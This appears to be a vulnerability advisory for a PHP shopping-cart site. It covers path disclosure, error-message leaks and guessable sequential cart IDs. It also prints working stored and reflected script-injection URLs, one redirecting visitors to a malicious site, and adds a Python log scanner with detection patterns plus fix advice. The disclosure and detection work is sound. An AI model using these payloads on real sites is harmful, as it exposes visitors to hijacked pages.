===============================================================
!discussion 1 - Full Path Disclosure
The server returns a verbose error (disclosing the script's full
server-side path) when any URL, real or imaginary, is passed to
the POST_DATA parameter:
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com
===============================================================
!discussion 2 - Information Disclosure
When a user is not signed in, the database tables are revealed to
the attacker through an error message, because the PHP form fails
to properly sanitize user_id when no user is logged in.
===============================================================
!discussion 3 - Arbitrary Code Injection
The attacker is able to create shopping carts whose name contains
injected HTML/JavaScript, such as:
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.google.com">Google</a></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>
Then, when the user visits "My Saved Carts" at
http://victim.com/user_carts.php, the injected code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a JavaScript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.
Note: manuals_search.php is vulnerable to the same HTML/JavaScript
injection, which allows arbitrary script to be executed:
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>
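As an added detection example (not part of this advisory), the following Python scan covers the request patterns from discussions 1 and 3: an HTML tag in cart_name or manuals_search, and an absolute URL in POST_DATA. Only the script and parameter names come from the advisory; the log format and sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows stored/reflected without output encoding.
HTML_SINK_PARAMS = ("cart_name", "manuals_search")
# Parameter whose value triggers the verbose error / full path disclosure.
URL_PARAM = "POST_DATA"

# Any HTML tag, or a javascript: URL, inside a parameter stored verbatim.
HTML_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>|javascript:", re.IGNORECASE)
# An absolute URL of any scheme (http://, https://, ftp://, ...).
ABS_URL_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def classify_request(url):
    """Return the findings for one request URL (empty list if benign)."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)  # values are URL-decoded here
    findings = []
    for name in HTML_SINK_PARAMS:
        for value in params.get(name, []):
            if HTML_RE.search(value):
                findings.append("html_injection:%s:%s" % (parts.path, name))
    for value in params.get(URL_PARAM, []):
        if ABS_URL_RE.match(value):
            findings.append("external_url:%s:%s" % (parts.path, URL_PARAM))
    return findings

def scan_access_log(lines):
    """Yield (client_ip, finding) for each suspicious request in Common Log Format lines."""
    clf = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = clf.match(line)
        if not m:
            continue  # not a request line we understand; skip
        ip, target = m.groups()
        for finding in classify_request(target):
            yield ip, finding

# Constructed sample log lines; the payloads are the advisory's own examples,
# percent-encoded the way a web server would record them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cart_save.php?operation=save&rnd=&rp=products.php&cart_name=%3Chtml%3E%3Cscript%3Ealert(%22VULN%22);%3C/script%3E%3C/html%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /manuals_search.php?POST_DATA=http://site-that-does-not-exist.com HTTP/1.1" 500 0',
    '198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /cart_save.php?operation=save&rnd=&rp=products.php&cart_name=weekend%20shopping HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, finding in scan_access_log(SAMPLE_LOG):
        print(ip, finding)
```

The same check belongs server-side as a reject rule on cart_name before storage, with htmlspecialchars-style output encoding on user_carts.php as the actual fix.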
===============================================================
!extras
The cart name is all an attacker needs to guess or brute-force to
gain access to a saved shopping cart, since the cart ID simply
increments from 1 upwards. This does not require the attacker to
log in as any user.